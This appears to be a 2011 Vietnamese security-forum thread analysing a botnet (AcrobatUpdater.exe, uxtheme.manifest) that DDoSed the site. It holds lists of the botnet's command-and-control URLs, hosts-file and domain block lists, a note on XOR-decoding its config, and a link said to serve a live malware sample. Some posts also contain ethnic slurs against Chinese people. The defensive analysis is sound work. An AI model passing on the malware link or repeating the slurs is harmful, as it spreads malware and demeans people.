Các bạn STL cứ nhè URI "/" mà đập hoài vậy? Tớ vừa huy động thêm 1 con server bên Đức có 1000Mbit line đấy. Các bạn cứ tha hồ mà nhắm vào "/" để đập :P . Vừa kiểm lại logs thì thấy zombie cho "AcrobatUpdater.exe" đi từ các IP thuộc châu Âu, Nga, Ukraine, Mỹ, Úc (ngoài các bạn láng giềng như Hàn, Nhật và TQ). Các anti-viruses đã cập nhật def của họ để nhai sống con "AcrobatUpdater.exe" rồi. Trong vòng 1, 2 ngày tới những con này sẽ bị nhai sống từ các máy cập nhật def đều đặn.

Phân tích tính chất vài trận DDoS HVA vừa qua.

rang0 — GMT

Cùng chào đón 1 server mới của STL nào : Code:

http://map.priper.info:8080

Đây sẽ là địa chỉ để file uxtheme.manifest_29072011 connect và cập nhật (có lẽ là để thay thế cho cái speed.cyline.org)

Phân tích tính chất vài trận DDoS HVA vừa qua.

template — GMT

Bọn này chỉ làm việc theo lệnh của bọn tàu khựa, "Sống chết theo lệnh" mà, chúng làm việc dơ bẩn để có đồng tiền dơ bẩn thôi. Phải đập cho chúng 1 trận, còn không là chúng cứ sống chết theo lệnh mãi.

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

rang0 wrote:

Cùng chào đón 1 server mới của STL nào : Code:
http://map.priper.info:8080
Đây sẽ là địa chỉ để file uxtheme.manifest_29072011 connect và cập nhật (có lẽ là để thay thế cho cái speed.cyline.org)

Domain này (map.priper.info) đã bị suspended

This Account Has Been Suspended

Domain-website này: "speed.cyline.org", vẫn đang active. Nhưng nhiều lúc kết nôi đến website này rất châm (slow connection)

Phân tích tính chất vài trận DDoS HVA vừa qua.

LlyKil — GMT

Cuối cùng HVA đã "dựng" 1 cái firewall như mình mong đợi :P

Phân tích tính chất vài trận DDoS HVA vừa qua.

texudo — GMT

Thanks GOD (TQN, Conmale, PXMMRF ...and HVA team)...HVA ONLINE again :) Mấy ngày qua vào HVA ma không được, nghĩ chắc vẫn bị DDOS nặng nề lắm.

Phân tích tính chất vài trận DDoS HVA vừa qua.

ivanst — GMT

Bác com ơi , vào site bây giờ vừa khó , vừa lằng nhằng , nhiều khi hiện ra lỗi khó hiểu quá Mong các cao thủ tiếp tục phân tích,tìm cách bem các con virut vừa ddos HVA trong 3 ngày vừa qua

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

ivanst wrote:

Bác com ơi , vào site bây giờ vừa khó , vừa lằng nhằng , nhiều khi hiện ra lỗi khó hiểu quá Mong các cao thủ tiếp tục phân tích,tìm cách bem các con virut vừa ddos HVA trong 3 ngày vừa qua

Đã có thông báo về sự "lằng nhằng" rồi. Hy vọng bồ dành chút thời gian để đọc thông báo. Cám ơn.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Tụi stl đã chính thức tắt nguồn ra lệnh tấn công HVA và lên tiếng thương lượng: Chiều nay khi HVA hoạt động trở lại, em tranh thủ check thử cái host second.dinest.net xem nó còn sống không. trong khi mấy cái khác thì closed hàng loạt. Check xong, tính post lên HVA liền, mắc cười muốn bể bụng, nhưng phải đưa "heo sữa" đi xem phim nên giờ mới post. Tối giờ cứ mắc cười hoài;) Dùng Fiddler, em request file xv.jpg từ second.dinest.net, ra kết quả: 2011-07-31 21:55:20. À vậy là còn sống, ra lệnh đám bot AcrobatUpdater.exe config mới đã có ngày hôm qua. Tụi mày lên down về, làm theo lệnh. Em down tiếp xc.jpg, Decode.exe ra, ra dòng thú vị sau trong item targets (chỉ có một mình target là HVA chúng ta thôi): Code:

Hì hì, vậy stl hacker đã set enabled=0 cho HVA chúng ta. Các bạn đọc kỹ dòng referer nhé. Tiếng Anh em thì dốt, nói thì như cọp nhai đậu phộng, đọc thì cứ phang như tiếng Việt, nên em cứ thắc mắc ở chổ: "forced we" ? "forced we" hay "forced us" bà con ! Em nhớ mang máng là "forced us" mới đúng chứ ? Lại mắc cười ở chổ, lúc trước, mấy anh stl hoành hoành bá đạo, đánh phá lung tung, vỗ ngực hênh hoang, coi trời bằng vung, chơi trò "bạch hoá" hèn hạ, làm nhục, bêu xấu hết người này tới người khác, "force" người ta tới đường cùng. Vậy lúc đó mấy anh có nghĩ tới lúc này không, khi mấy anh bị các hắc cơ mũ trắng, không mũ, mất mũ như anh em HVA "phọt" lại, "dầu hắc hoá" mấy anh không ? Bây giờ mấy anh lên tiếng năn nỉ, please nữa à ! Chắc là chỉ tiêu đánh phá, "ổn định chính trị" của mấy anh không đạt, bị xếp dập, phạt, trừ lương phải không mấy anh ? Tội nghiệp ! PS: À, mà mấy anh cũng thâm thật, miệng thì nói "em không muốn" vậy mà "em" cứ phang DDOS hoài hoài, hết đợt này tới đợt khác vậy à. Mấy anh gian xão giống tàu khựa vậy à ?

Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 — GMT

@anh TQN enabled="0" có nghĩa là họ dừng lại để cho anh post thông báo của họ lên HVA "Don't touch us anymore, please!" có nghĩa là đừng động đến chúng tôi không thì hậu quả khôn lường, đây là lời đe doạ chứ không phải xin xỏ gì cả. :D

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Vậy à, vậy thì em phải thu xếp đi học "In lit" lại rồi. Em dùng Google Translate, dịch nó ra thành vậy, vậy tại Google đó chứ:

Chúng tôi không muốn làm điều đó nhưng Postmodernism bắt buộc chúng tôi ! Không chạm vào chúng tôi nữa, xin vui lòng!

Nếu hăm doạ thì chúng ta phải tiếp tục thôi, chứ không lẽ vì lời hăm doạ, vì DDOS mà chúng ta phải dừng lại à ! Mấy hôm nay, không vào HVA được, tiếp tục RCE cho xong các đống "mèo què" của stl từ hồi trước tới giờ. Bắt đầu bằng Vecebot, file icon.dat của nó chứa thông tin về DDOS config của tụi nó vào xcafe hồi đó, tương tự như xc.jpg và xv.jpg bây giờ. File icon.dat được mã hoá đơn giản hơn, chỉ bằng xor từng byte trong file với 0x1F. Sau khi xor lại với 0x1F, lòi ra hai host cũ hồi đó của stl: Code:

safebrowser.dyndns.org/photos/safebrowser1.gif
safebrowsing.dyndns-blog.com/photos/safebrowser1.gif

Cũng lại là host trên dyndns.

Phân tích tính chất vài trận DDoS HVA vừa qua.

ga_cum06 — GMT

Nói chung là dù có thế nào , dù có tấn công hay ko tấn công vào Hva thì STL đã tuyên chiến với cộng đồng mạng rồi. Có hăm doạ hay Pờ lì năn nỉ đi nữa thì cũng không thể ngừng cuộc chiến này được :). e nghĩ chắc giờ đây có khá nhiều ng đang âm thầm theo dõi và tìm cách tiêu diệt STL th :)..... nhớ có câu ngày xưa xem phim chưởng "Đạo cao 1 thước ma cao 1 trượng " -:|- nhưng cũng luôn có câu "Tà không thể thắng chính " =)) Bác TQN có mail hay gì cho em phát em xin bác vài thứ cái ạ ;)) nói ở đây ko tiện ;))

Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 — GMT

@anh TQN em dịch theo ý tứ ngữ nghĩa thôi chứ không dịch sát nghĩa như anh :D

Phân tích tính chất vài trận DDoS HVA vừa qua.

~simon~ — GMT

Em đọc đến đây cũng biết được phần nào công sức của mọi người trong vụ này,hiểu được một phần câu chuyện ,nhưng thắc mắc mãi chữ STL nghĩa là gì nghĩ hoài không ra ?

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Ặc ặc, đọc tới đây mà không biết stl là gì à ? stl = sinh tử lệnh = sống chết theo lệnh !? stl # STL: C++ Standard Template Library nhé. Chớ nhầm lẫn là tụi coder C++ khắp thế giới nhảy vào phang đấy.

Phân tích tính chất vài trận DDoS HVA vừa qua.

angel-pc — GMT

Facebook của bọn nó nè: http://www.facebook.com/pages/Sinh-T%E1%BB%AD-L%E1%BB%87nh/157466794320222 Ai có căm thù thì vào đó mặc sức chữi :D

Phân tích tính chất vài trận DDoS HVA vừa qua.

texudo — GMT

We don't want to did that but Postmodernism forced we! -> Cái này có lẽ anh văn của một thằng Khựa, nói chung dân Khựa không khá về mặt Anh văn. Bọn stl này hoành hành từ lâu, không muốn nói tới chính trị nhưng có một mối liên hệ đặc biệt giữa stl và nhiều người làm chính trị đang bị cầm tù ở VN. Có chăng bọn này lấy được user và pass của những người như LCD, THDT....rồi chuyển cho giới chức...để bắt họ.

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

He he, đọc cái thông điệp tiếng Anh kia đúng là tiếng Anh giọng... Việt chớ chả phải khựa quái gì hết. Văn phạm và cấu trúc câu của tiếng Hoa không thể dịch ra dòng tiếng Anh trên mà chỉ có thể từ tiếng Việt mà thôi. Thêm nữa, mớ zombies của STL vẫn còn sống nhiều bởi vì 2 lý do: 1. Đám AV nửa mùa không thể phân tích và nhận thấy tính bất thường của con zombie cho nên không thể ra virus definition. Thất vọng nhất là đám Symantec Norton:

Symantec wrote:

We have processed your submission (Tracking #20846824) and your submission is now closed. The following is a report of our findings for the files in your submission: File: AcrobatUpdater.exe Machine: Machine Determination: Please see the developer notes.

Symantec wrote:

--------------------------------------------------------------------------- Developer Notes --------------------------------------------------------------------------- AcrobatUpdater.exe Our automation was unable to identify any malicious content in this submission. The file will be stored for further human analysis

2. Hàng chục ngàn máy ở Việt Nam, đặc biệt là ở các trường đại học và các tiệm net hoàn toàn không thèm "ke" về chuyện cập nhật antivirus def. Âu cũng là thời u ám cho nên ngay cả trên thế giới ảo cũng u ám.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Sáng nay kiểm tra lại second.dinest.net, tụi nó lại cho DDOS lại: Code:

1. xv.jpg: 2011-08-02 00:27:53: Bắt đầu khuya hôm nay.
2. xc.jpg:

DDOS hoài không chán à ta ? Anh em bà con suy nghĩ thử có cách nào cho cái second.dinest.net này câm luôn không ? Xin cùng nêu ý kiến !

Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 — GMT

Đúng như em nói bọn STL này đe doạ chứ không phải xin xỏ gì cả, English của bọn này toàn học từ thầy Gu Gồ

Phân tích tính chất vài trận DDoS HVA vừa qua.

texudo — GMT

Bọn stl này đúng là điên cuồng, cuồng thật rồi. http://www.baomoi.com/Home/CNTT/hanoimoi.com.vn/Hon-85000-may-tinh-tai-Viet-Nam-da-bi-lay-cap-du-lieu/6731238.epi Có bài này của Bkav ...chỉ thấy nhắc tới FLASH, ADOBE ACROBAT UPDATE...mà không thấy đả động giừ tới Vietkey, Unikey cả, mà 2 chương trình gõ tiếng Việt này thì 95% máy tính ở VN có cài.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Danh sách các host và các file virus, DDOS commands của tụi stl mà chúng ta đã biết được tính tới thời điểm này: Code:

1.  http://safebrowser.dyndns.org/photos/safebrowser1.gif
2.  http://safebrowsing.dyndns-blog.com/photos/safebrowser1.gif
3.  http://express.blogdns.info/advertise.gif
4.  http://fastupdate.dyndns-office.com/advertise.gif
5.  http://hot.enfaqs.com/advertise.gif
6.  http://securelogin.doomdns.com/advertise.gif
7.  http://tongfeirou.dyndns-web.com/banner1.png
8.  http://biouzhen.dyndns-server.com/banner1.png
9.  http://maowoli.dyndns-free.com/banner1.png
10. http://poxxf.com/flash.swf
11. http://paxds.com/flash.swf
12. http://poxxf.com/images.gif
13. http://speed.cyline.org:443/flower.bmp
14. http://speed.cyline.org:443/BlueSphere.bmp
15. http://speed.cyline.org:443/plxzyin0fx.bmp
16. http://second.dinest.net/xc.jpg
17. http://second.dinest.net/xv.jpg

Mong bà con phổ biến, bật firewall để lọc các URL trên và các trình capture để check.

Phân tích tính chất vài trận DDoS HVA vừa qua.

rang0 — GMT

PXMMRF wrote:

rang0 wrote:
Cùng chào đón 1 server mới của STL nào : Code:
http://map.priper.info:8080
Đây sẽ là địa chỉ để file uxtheme.manifest_29072011 connect và cập nhật (có lẽ là để thay thế cho cái speed.cyline.org)
Domain này (map.priper.info) đã bị suspended
This Account Has Been Suspended
Domain-website này: "speed.cyline.org", vẫn đang active. Nhưng nhiều lúc kết nôi đến website này rất châm (slow connection)

Em không biết anh check cái "map.ripper.info" thế nào nhưng hôm nay em vẫn download được malware từ cái host đó : Code:

http://www.mediafire.com/?bdk5fvj8bf8k6nr

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

Công nhận các bạn STL "sneaky" thiệt :-) . Tớ phải mất một buổi ngồi dòm cái đống log chạy ròng rã mới hiểu được lý do tại sao thằng tomcat của HVA bị treo qua đêm. Các bạn chơi trò đấm rỉ rả kiểu này thiệt là hiểm. Các bạn muốn bịt miệng HVA như đã bịt miệng những trang khác sao? Các bạn phải biết rằng các bạn chưa đủ sức để bịt cả Internet (ngoài chuyện đặt tường lừa để cản thì không phải bàn).

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Xin hỏi rang0 đường link map.ripper.info được lấy từ đâu và thằng virus nằm vùng nào lên đấy down về ?

Phân tích tính chất vài trận DDoS HVA vừa qua.

rang0 — GMT

TQN wrote:

Xin hỏi rang0 đường link map.ripper.info được lấy từ đâu và thằng virus nằm vùng nào lên đấy down về ?

Em quên mất rồi :(

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

TQN wrote:

Danh sách các host và các file virus, DDOS commands của tụi stl mà chúng ta đã biết được tính tới thời điểm này: Code:

1.  http://safebrowser.dyndns.org/photos/safebrowser1.gif
2.  http://safebrowsing.dyndns-blog.com/photos/safebrowser1.gif
3.  http://express.blogdns.info/advertise.gif
4.  http://fastupdate.dyndns-office.com/advertise.gif
5.  http://hot.enfaqs.com/advertise.gif
6.  http://securelogin.doomdns.com/advertise.gif
7.  http://tongfeirou.dyndns-web.com/banner1.png
8.  http://biouzhen.dyndns-server.com/banner1.png
9.  http://maowoli.dyndns-free.com/banner1.png
10. http://poxxf.com/flash.swf
11. http://paxds.com/flash.swf
12. http://poxxf.com/images.gif
13. http://speed.cyline.org:443/flower.bmp
14. http://speed.cyline.org:443/BlueSphere.bmp
15. http://speed.cyline.org:443/plxzyin0fx.bmp
16. http://second.dinest.net/xc.jpg
17. http://second.dinest.net/xv.jpg

Mong bà con phổ biến, bật firewall để lọc các URL trên và các trình capture để check.

Chỉ cần thêm mớ này vô host file (trong C:\windows\system32\drivers\etc\) là xong: Code:

127.0.0.1 safebrowser.dyndns.org
127.0.0.1 safebrowsing.dyndns-blog.com
127.0.0.1 express.blogdns.info
127.0.0.1 fastupdate.dyndns-office.com
127.0.0.1 hot.enfaqs.com
127.0.0.1 securelogin.doomdns.com
127.0.0.1 tongfeirou.dyndns-web.com
127.0.0.1 biouzhen.dyndns-server.com
127.0.0.1 maowoli.dyndns-free.com
127.0.0.1 poxxf.com
127.0.0.1 paxds.com
127.0.0.1 poxxf.com
127.0.0.1 speed.cyline.org
127.0.0.1 second.dinest.net

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Đúng là tụi này thâm và nham hiểm thật. Chỉ một chút sơ hở, chủ quan của anh em ta mà tụi nó đã move và build toàn bộ các bot mới qua host khác. Bây giờ tấn công HVA không còn một mình AcrobatUpdater.exe nữa. Bà con cứ gặp uxtheme.manifest thì xoá ngay tắp lự giúp em nhé Cảm ơn rang0 nhé !

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

TQN wrote:

Đúng là tụi này thâm và nham hiểm thật. Chỉ một chút sơ hở, chủ quan của anh em ta mà tụi nó đã move và build toàn bộ các bot mới qua host khác. Bây giờ tấn công HVA không còn một mình AcrobatUpdater.exe nữa. Bà con cứ gặp uxtheme.manifest thì xoá ngay tắp lự giúp em nhé Cảm ơn rang0 nhé !

He he, cái botnet mới này đấm không nhanh và nhiều như cái cũ mà đấm chậm, chắc và âm ỉ, kiểu như bên ngoài không thấy bị trầy xước nhưng bên trong lục phủ ngũ tạng bị bấy nhầy vậy :-) . Đúng là anh em ta chủ quan quá. Cứ nhắm vô cái botnet đã lộ để phòng thủ nên bị chết là phải.

Phân tích tính chất vài trận DDoS HVA vừa qua.

tranvanminh — GMT

He he, cái botnet mới này đấm không nhanh và nhiều như cái cũ mà đấm chậm, chắc và âm ỉ, kiểu như bên ngoài không thấy bị trầy xước nhưng bên trong lục phủ ngũ tạng bị bấy nhầy vậy . Đúng là anh em ta chủ quan quá. Cứ nhắm vô cái botnet đã lộ để phòng thủ nên bị chết là phải.

Anh mô tả mà em đọc như chiêu "Đại lực kim cương chỉ" của thiếu lâm :))

Phân tích tính chất vài trận DDoS HVA vừa qua.

vndncn — GMT

texudo wrote:

Bọn stl này đúng là điên cuồng, cuồng thật rồi. http://www.baomoi.com/Home/CNTT/hanoimoi.com.vn/Hon-85000-may-tinh-tai-Viet-Nam-da-bi-lay-cap-du-lieu/6731238.epi Có bài này của Bkav ...chỉ thấy nhắc tới FLASH, ADOBE ACROBAT UPDATE...mà không thấy đả động giừ tới Vietkey, Unikey cả, mà 2 chương trình gõ tiếng Việt này thì 95% máy tính ở VN có cài.

Đi nghe pác Q bom nói. Không biết ngoài Unikey, Vietkey, Winrar có chứa virus không mấy anh nhỉ? Mấy ngày nay không vào HVA được buồn quá!

Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 — GMT

Em có ít thông tin về cái http://tongfeirou.dyndns-web.com

Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 — GMT

Tiếp 1 số thứ bên trong

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

texudo wrote:

Bọn stl này đúng là điên cuồng, cuồng thật rồi. http://www.baomoi.com/Home/CNTT/hanoimoi.com.vn/Hon-85000-may-tinh-tai-Viet-Nam-da-bi-lay-cap-du-lieu/6731238.epi Có bài này của Bkav ...chỉ thấy nhắc tới FLASH, ADOBE ACROBAT UPDATE...mà không thấy đả động giừ tới Vietkey, Unikey cả, mà 2 chương trình gõ tiếng Việt này thì 95% máy tính ở VN có cài.

Ramnit là virus lây file, không phải các virus được đề cập trong chủ đề này đâu.

Phân tích tính chất vài trận DDoS HVA vừa qua.

Dpm — GMT

conmale wrote:

Công nhận các bạn STL "sneaky" thiệt :-) . Tớ phải mất một buổi ngồi dòm cái đống log chạy ròng rã mới hiểu được lý do tại sao thằng tomcat của HVA bị treo qua đêm. Các bạn chơi trò đấm rỉ rả kiểu này thiệt là hiểm. Các bạn muốn bịt miệng HVA như đã bịt miệng những trang khác sao? Các bạn phải biết rằng các bạn chưa đủ sức để bịt cả Internet (ngoài chuyện đặt tường lừa để cản thì không phải bàn).

Hi anh Conmale,Anh có thể giải thích rõ chỗ màu đỏ đc không,chúng sử dụng kỹ thuật gì vậy anh?

Phân tích tính chất vài trận DDoS HVA vừa qua.

lequi — GMT

conmale wrote:

Công nhận các bạn STL "sneaky" thiệt :-) . Tớ phải mất một buổi ngồi dòm cái đống log chạy ròng rã mới hiểu được lý do tại sao thằng tomcat của HVA bị treo qua đêm. Các bạn chơi trò đấm rỉ rả kiểu này thiệt là hiểm. Các bạn muốn bịt miệng HVA như đã bịt miệng những trang khác sao? Các bạn phải biết rằng các bạn chưa đủ sức để bịt cả Internet (ngoài chuyện đặt tường lừa để cản thì không phải bàn).

Tụi STL làm đầy log tomcat hả a :D

Phân tích tính chất vài trận DDoS HVA vừa qua.

yuhari — GMT

trận sáng nay là gì nhỉ -:|-

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

yuhari wrote:

trận sáng nay là gì nhỉ -:|-

Trận sáng nay có tên là "thổ phỉ mạo danh chân tu" :-) Các bạn STL đấm kinh thế?

(hình chụp lúc 3 giờ 22 phút sáng ngày 4 tháng 8 năm 2011). Đấm cỡ này, các bạn vô diễn đàn thấy nhanh hay chậm? Cỡ HVA, một diễn đàn phi lợi nhuận, tự duy trì bằng tiền túi mà các bạn đấm không chết nổi thì vứt quách cái botnet đi vì nó chẳng đập nổi ai ngoài mấy cái site nhảm. Malware thì đạo code, đạo ý tưởng, chắp vá. "hắc kinh" thì chọn kế sách bẩn thỉu nhất (ăn cắp pass) chớ chẳng bao giờ chơi nổi trò tấn công trực diện, thiên hạ thì bị "bạch hoá" bằng cách thêu dệt bậy bạ còn bản thân mình thì chui nhủi như đám sinh vật sợ ánh sáng. Từ kỹ thuật đế tư cách đều thuộc dạng tin tặc hạng bét. Ngay cả bọn blackhat chôm chĩa credit card hay cho thuê bot để tấn công thiên hạ còn có một chút nguyên tắc và mục đích thấp hèn là để kiếm tiền. Các bạn thì chỉ loay hoay với một mớ niềm tin và tự ái vặt để làm những việc bại hoại, đáng phỉ nhổ. Các bạn trẻ tuổi nông nổi thì không nói gì, các bạn đã có tuổi và đã kinh qua mà vẫn hỗ trợ những trò bại hoại, thấp hèn như thế này thì không biết các bạn đang cố bảo vệ cái gì nữa, chắc là các bạn đang bảo vệ cái gì "đẹp đẽ" lắm.

Phân tích tính chất vài trận DDoS HVA vừa qua.

texudo — GMT

http://www.ictnews.vn/Home/bao-mat/Lien-Hop-Quoc-nan-nhan-cua%C2%A0vu-tan-cong-mang-lich-su/2011/08/2MSVC1986453/View.htm Không biết có liên quan gì tới những gì mà HVA Team đang phân tích không? Nhưng bản chất đằng sau việc này là Khựa, có khi nào khựa nó có một công ty của chính phủ chuyên làm nhiệm vụ này, trong đó STL là một team trong đó?

Phân tích tính chất vài trận DDoS HVA vừa qua.

elt0m — GMT

TQN wrote:

Ặc ặc, đọc tới đây mà không biết stl là gì à ? stl = sinh tử lệnh = sống chết theo lệnh !? stl # STL: C++ Standard Template Library nhé. Chớ nhầm lẫn là tụi coder C++ khắp thế giới nhảy vào phang đấy.

xin lỗi spam tý nhé! Theo mình lũ này phải gọi là: Sờ Ti Lợn (STL) mới đúng! =))

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

rang0 wrote:

PXMMRF wrote:
rang0 wrote:
Cùng chào đón 1 server mới của STL nào : Code:
http://map.priper.info:8080
Đây sẽ là địa chỉ để file uxtheme.manifest_29072011 connect và cập nhật (có lẽ là để thay thế cho cái speed.cyline.org)
Domain này (map.priper.info) đã bị suspended
This Account Has Been Suspended
Domain-website này: "speed.cyline.org", vẫn đang active. Nhưng nhiều lúc kết nôi đến website này rất châm (slow connection)
Em không biết anh check cái "map.ripper.info" thế nào nhưng hôm nay em vẫn download được malware từ cái host đó : Code:
http://www.mediafire.com/?bdk5fvj8bf8k6nr

Domain map.ripper.info là tên miền con (subdomain) của domain ripper.info. Tên miền ripper.info bị suspended (treo). Có một số lý do khiến tên miền bị treo, trong đó lý do chính, phổ biến là người dùng (registrant) không, chưa trả tiền đúng thời hạn cho công ty quản lý domain (registrar). Domain chính ripper.info bị treo thì các subdomain của nó dĩ nhiên cũng bị treo trong sử dụng. Công ty quản lý domain này (ripper.info) là SEDO, (Anh quốc). Domain và website mang tên domain gắn chặt với nhau, nhưng không phải là một. Vì vậy khi domain bị treo, website vẫn có thể vẫn active, nhưng nói chung chỉ được vài ngày. Lý do là việc create host hay thay đổi create host mất công và tốn thời gian (khoảng tối thiểu 2 ngày), nên registrar cân nhắc trong việc này: Họ cảnh báo tình trạng suspended để người dùng mau chóng trả tiền, như thế họ không cần phải create host lại. Đồng thời họ cũng đợi có khách hàng mới mua lại domain này thì create host lai luôn thể. Vì vậy vào ngày 1-8-2011 tôi phát hiện ra domain ripper.info bị suspended, thì có thể trong một hai ngày sau đó, STL vẫn còn tận dụng đươc domain nay để active website map.ripper.info. Tuy nhiên đến ngày 3-8 (hôm qua) thì domain này đã trỏ đến một trang của website của công ty SEDO Trang chủ của website của công ty SEDO: http://www.sedo.com/uk/home/welcome/?tracked=1&partnerid=20293&language=e Đây là trang của SEDO thông báo bán ripper.info: http://www.sedo.com/search/details.php4?domain=ripper.info&trackingRequestId=16343907&tracked=1&partnerid=20293&language=e Note: 1- Từ ngày 2-8 tôi đã hoàn tất việc thiết lập một sever (loai nhỏ nhưng có 2 CPU) riêng, chuyên dùng để kiểm tra các virus-trojạn của STL, xác định chính xác các kết nối trên mạng của các virus-trojan này. Server được cài nhiều chương trình theo rõi mạng, antivirus, firewall tiên tiến. Tôi đang thử file Unikey của bạn lequi trước đây đã cung cấp. Sẽ thông báo kết quả cụ thể sau. 2- Tôi đã có đủ thông tin về webserver-website "speed.cyline.org" của STL. Cũng sẽ thông báo hầu các bạn

Phân tích tính chất vài trận DDoS HVA vừa qua.

rang0 — GMT

PXMMRF wrote:

Vì vậy vào ngày 1-8-2011 tôi phát hiện ra domain ripper.info bị suspended, thì có thể trong một hai ngay sau đó STL vẫn còn tận dụng đươc domain nay để active website map.ripper.info. Tuy nhiên đến ngày 3-8 (hôm qua) thì domain này đã trỏ đến một trang của website của công ty SEDO Trang chủ của website của công ty SEDO: http://www.sedo.com/uk/home/welcome/?tracked=1&partnerid=20293&language=e Đây là trang của SEDO thông báo bán ripper.info: http://www.sedo.com/search/details.php4?domain=ripper.info&trackingRequestId=16343907&tracked=1&partnerid=20293&language=e

Anh ơi "ripper.info" với "pripper.info" là nó khác nhau đấy ạ. Hôm nay cái subdomain này lại được trỏ sang con server khác rồi. Hôm trước Code:

Trước: map.priper.info [91.121.221.222]
Hôm nay : map.priper.info [208.115.200.206]

Và malware vẫn đang được cập nhật đều :(.

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

rang0 wrote:

PXMMRF wrote:

Vì vậy vào ngày 1-8-2011 tôi phát hiện ra domain ripper.info bị suspended, thì có thể trong một hai ngay sau đó STL vẫn còn tận dụng đươc domain nay để active website map.ripper.info. Tuy nhiên đến ngày 3-8 (hôm qua) thì domain này đã trỏ đến một trang của website của công ty SEDO Trang chủ của website của công ty SEDO: http://www.sedo.com/uk/home/welcome/?tracked=1&partnerid=20293&language=e Đây là trang của SEDO thông báo bán ripper.info: http://www.sedo.com/search/details.php4?domain=ripper.info&trackingRequestId=16343907&tracked=1&partnerid=20293&language=e
Anh ơi "ripper.info" với "pripper.info" là nó khác nhau đấy ạ. Hôm nay cái subdomain này lại được trỏ sang con server khác rồi. Hôm trước Code:
Trước: map.priper.info [91.121.221.222]
Hôm nay : map.priper.info [208.115.200.206]
Và malware vẫn đang được cập nhật đều :(.

Ừ khác nhau, nhiều là khác. Như là PHAM XUAN MAI với ĐẶNG THÁI MAI. Người sau là một danh nhân nước Việt, bố vợ của Đại tướng huyền thoại VÕ NGUYÊN GIÁP. Còn kẻ trước chỉ là một người dân bình thường, không tên tuổi, tuy được học hành bài bản đến nơi đến chốn (bằng cấp thật 100%), nhưng khả năng có hạn. HÌ hì. Đùa một chút. Thôi trở lại vấn đề. Xem lai bài của rang0 (trang 9 topic này) thì domain đúng là map.priper.info thật. Nhưng vào đia chỉ này http://map.priper.info:8080 (webserver mở cổng 8080-chắc cài Apache) thì cũng lại thấy domain này cũng bị suspended. Thôi để tôi kiểm tra kỹ hơn. Nếu http://map.priper.info cũng đang bị suspended thật, thì những nôi dung tôi viết ở post trên liên quan đến vấn đề "suspended" vẫn hoàn toàn có thể áp dụng được với map.priper.info(trừ đoan sau nói về ripper.info domain) Nôi dung liênquan đến suspended domain là: "Có một số lý do khiến tên miền bị treo, trong đó lý do chính, phổ biến là người dùng (registrant) không, chưa trả tiền đúng thời hạn cho công ty quản lý domain (registrar) ................... Domain và website mang tên domain gắn chặt với nhau, nhưng không phải là một. Vì vậy khi domain bị treo, website có thể vẫn active, nhưng nói chung chỉ được vài ngày. Lý do là việc create host hay thay đổi create host mất công và tốn thời gian (khoảng tối thiểu 2 ngày), nên registrar cân nhắc trong việc này: Họ cảnh báo tình trạng suspended để người dùng mau chóng trả tiền, như thế họ không cần phải create host lại. Đồng thời họ cũng đợi có khách hàng mới mua lại domain này thì create host lai luôn thể."

Phân tích tính chất vài trận DDoS HVA vừa qua.

trycatch — GMT

Theo dõi file anh Conmale thông báo (ddos_28-07-2011) thì có IP của cơ quan em(nhiều subnet) nên mình không biết cách xác định máy nào nhiễm malware của STL vì ko phải net admin chỉ là người dùng. bạn nào có cách hay soft gì thì hướng dẫn mình với. ps: báo cáo anh Conmale là file ddos-03-08-2011-uniq thì không có, nếu anh có cách gì thì mail cho em với nhé, em muốn góp chút gì đó để HVA giảm được tấn công ddos. E-mail và IP của em thì chắc anh thừa biết rồi. :d

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

trycatch wrote:

Theo dõi file anh Conmale thông báo (ddos_28-07-2011) thì có IP của cơ quan em(nhiều subnet) nên mình không biết cách xác định máy nào nhiễm malware của STL vì ko phải net admin chỉ là người dùng. bạn nào có cách hay soft gì thì hướng dẫn mình với. ps: báo cáo anh Conmale là file ddos-03-08-2011-uniq thì không có, nếu anh có cách gì thì mail cho em với nhé, em muốn góp chút gì đó để HVA giảm được tấn công ddos. E-mail và IP của em thì chắc anh thừa biết rồi. :d

Cách dễ nhất là search từng máy để tìm "AcrobatUpdater.exe". Cách ngăn chặn nhanh nhất ngay lúc này là chặn các domains và subdomains sau: dyndns.org dyndns-blog.com blogdns.info dyndns-office.com enfaqs.com doomdns.com dyndns-web.com dyndns-server.com dyndns-free.com poxxf.com paxds.com cyline.org dinest.net

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

Tìm mãi không biết từ đâu mà mình có cái domain "map.ripper.info" thay vì phải là "map.priper.info" mới đúng. Nay đã thấy. Hì hì

TQN on 03/08/2011 14:36:37 wrote:

Xin hỏi rang0 đường link map.ripper.info được lấy từ đâu và thằng virus nằm vùng nào lên đấy down về ?

rang0 wrote:

TQN wrote:

Xin hỏi rang0 đường link map.ripper.info được lấy từ đâu và thằng virus nằm vùng nào lên đấy down về ?
Em quên mất rồi :(

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

